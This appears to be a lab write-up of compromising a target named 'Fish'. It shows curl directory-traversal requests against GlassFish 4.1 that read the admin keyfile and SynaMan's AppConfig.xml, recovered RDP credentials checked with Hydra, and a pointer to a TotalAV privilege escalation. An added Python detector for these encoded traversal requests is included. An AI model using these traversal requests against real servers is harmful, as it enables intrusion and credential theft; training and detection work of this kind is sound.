# Fish

## Nmap

```
nmap 192.168.213.168 -sS -sV -p- -Pn

PORT     STATE SERVICE              VERSION
3389/tcp open  ms-wbt-server?
3700/tcp open  giop                 CORBA naming service
4848/tcp open  http                 Sun GlassFish Open Source Edition  4.1
6060/tcp open  x11?
7676/tcp open  java-message-service Java Message Service 301
7680/tcp open  pando-pub?
8080/tcp open  http                 Sun GlassFish Open Source Edition  4.1
8181/tcp open  ssl/http             Sun GlassFish Open Source Edition  4.1
8686/tcp open  sun-as-jmxrmi?
```

Starting out, we use `searchsploit` to look for known vulnerabilities in the discovered services.

```bash
searchsploit -w "GlassFish 4.1"
```

![](/files/eh9y8d5nHQwucBiDoNY3)

Looks like the version of GlassFish running is vulnerable to Directory Traversal. The following exploit examples can be used to read known system files.

**ExploitDB:** <https://www.exploit-db.com/exploits/39441>

Using one of the examples in the link with the correct IP and port we are able to build a `curl` GET request to confirm the directory traversal.

```bash
curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
```

![](/files/kjU9j6ab2X4bRVOlRjFO)
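As an added defensive counterpart (this is not code from the original write-up), the following Python decodes request paths from access log lines the way a lenient UTF-8 decoder would, folding the overlong `%c0%af` sequences used in the request above back to `/` (and `%c0%ae` to `.`) before checking whether the path climbs above the web root. It assumes a combined-format access log; the log lines are constructed samples.

```python
import re
from urllib.parse import unquote_to_bytes

# Overlong two-byte UTF-8: lead byte C0/C1 plus a continuation byte. Strict decoders reject
# it, but a lenient one maps C0 AF to '/' and C0 AE to '.', so "%c0%af.." gets past "../" filters.
OVERLONG = re.compile(rb'[\xc0\xc1][\x80-\xbf]')
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<path>\S+) HTTP/')  # assumed combined log layout

def fold_overlong(m):
    """Collapse one overlong two-byte sequence to the ASCII byte it encodes."""
    lead, cont = m.group(0)
    return bytes([((lead & 0x1F) << 6) | (cont & 0x3F)])

def normalise_path(raw_path):
    """Percent-decode and fold overlong bytes, twice, so double encoding is caught too."""
    data = raw_path.encode('latin-1', 'replace')
    for _ in range(2):
        data = OVERLONG.sub(fold_overlong, unquote_to_bytes(data))
    return data.decode('latin-1')

def escapes_root(path):
    """True if '..' segments climb above the web root at any point."""
    depth = 0
    for seg in path.replace('\\', '/').split('/'):
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ('', '.'):
            depth += 1
    return False

def flag_traversal(log_lines):
    """Return (raw, normalised) pairs for requests whose decoded path leaves the web root."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m:
            norm = normalise_path(m.group('path'))
            if escapes_root(norm):
                hits.append((m.group('path'), norm))
    return hits

# Constructed sample lines in combined log format; not real GlassFish output.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /theme/META-INF/prototype.js HTTP/1.1" 200 4021',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 200 92',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /theme/META-INF/prototype%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af../SynaMan/config/AppConfig.xml HTTP/1.1" 200 1180',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /theme/../theme/META-INF/prototype.js HTTP/1.1" 200 4021',
]
```

Running `flag_traversal(SAMPLE_LOG)` flags the two encoded requests and leaves the benign `..` that stays inside the web root alone; the same normalisation belongs in front of any path-based allow/deny rule, not only in log review.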

After this I looked up configuration files for GlassFish to see if we can read any sensitive credential files. This StackOverflow [link](https://stackoverflow.com/questions/41078683/how-do-i-reset-the-forgotten-password-of-glassfish-server-4) proved to be informative and I was able to read the admin hash for GlassFish with a little bit of guesswork.

```bash
curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../glassfish4/glassfish/domains/domain1/config/admin-keyfile
```

![](/files/WN3u9KWcbdRLxE3YtWge)

Unfortunately, however, I was unable to crack the hash or proceed with anything meaningful for now.

Looking through the rest of the open ports manually, we come across the page "SynaMan", which we observe is running version 4.0.

![](/files/GEdDg27aLcV7KMhvLFPN)

Again, with `searchsploit` we are able to see if the version running is vulnerable.

```bash
searchsploit -w "SynaMan 4.0"
```

![](/files/QAbAJMsokMnUWWsMfpwW)

The `SMTP` disclosure is interesting to us:

**ExploitDB:** <https://www.exploit-db.com/exploits/45387>

![](/files/uInHKADNRT8hucFFi34C)

We see from the description that, as we already have a directory traversal exploit on the system, we can likely read the desired `AppConfig.xml`.

```bash
curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../SynaMan/config/AppConfig.xml
```

![](/files/0Z7Q09A34fY8sMTvG7HW)

From the output we are able to tie together the following credentials:

```
arthur:KingOfAtlantis
```

Since `RDP` is open, a quick check with `Hydra` confirms the credentials are valid.

```bash
hydra -l "arthur" -p "KingOfAtlantis" rdp://<IP>
```

![](/files/cGra9NtjLQARVYNNwBbR)

We can then connect via `RDP` to the target system.

```bash
xfreerdp /u:"arthur" /p:"KingOfAtlantis" +clipboard /v:<IP>
```

![](/files/RHOgcSC7R1QJb0Yew97n)

We see on the desktop a shortcut for the AV application `TotalAV`. Checking `appwiz.cpl`, we see that the installed version is *4.14.31*.

![](/files/9Pbvv3OfZ3brxe75A8q4)

`searchsploit` again shows a vulnerability with the installed version.

```bash
searchsploit -w "TotalAV 4.14.31"
```

![](/files/GAEJQ27JeSXv7gowoG03)

This version of `TotalAV` appears to be vulnerable to Privilege Escalation.

**ExploitDB:** <https://www.exploit-db.com/exploits/47897>

**Youtube:** <https://www.youtube.com/watch?v=88qeaLq98Gc>
